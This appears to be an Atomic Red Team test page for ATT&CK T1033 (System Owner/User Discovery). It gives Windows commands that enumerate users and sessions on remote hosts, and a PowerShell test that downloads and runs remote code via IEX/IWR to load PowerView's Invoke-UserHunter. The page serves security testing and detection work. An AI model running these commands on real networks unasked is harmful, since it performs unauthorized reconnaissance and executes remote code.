Skip to content
Switch branches/tags
Go to file
Latest commit bc21f59 Sep 4, 2021 History
…er [skip ci]
4 contributors

Users who have contributed to this file

@clr2of8 @ForensicITGuy @Tsora-Pop @mgraeber-rc

T1033 - System Owner/User Discovery

Description from ATT&CK

Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping]( The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery]( during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Utilities and commands that acquire this information include whoami. In Mac and Linux, the currently logged in user can be identified with w and who.

Atomic Tests

Atomic Test #1 - System Owner/User Discovery

Identify System owner or users on an endpoint.

Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. Additionally, two files will be written to disk - computers.txt and usernames.txt.

Supported Platforms: Windows

auto_generated_guid: 4c4959bf-addf-4b4a-be86-8d09cc1857aa


Name Description Type Default Value
computer_name Name of remote computer String localhost

Attack Commands: Run with command_prompt!

cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
qwinsta.exe /server:#{computer_name}
for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt

Atomic Test #2 - System Owner/User Discovery

Identify System owner or users on an endpoint

Upon successful execution, sh will stdout list of usernames.

Supported Platforms: Linux, macOS

auto_generated_guid: 2a9b677d-a230-44f4-ad86-782df1ef108c

Attack Commands: Run with sh!


Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView)

Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed.

Supported Platforms: Windows

auto_generated_guid: 29857f27-a36f-4f7e-8084-4557cd6207ca

Attack Commands: Run with powershell!

[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR '' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose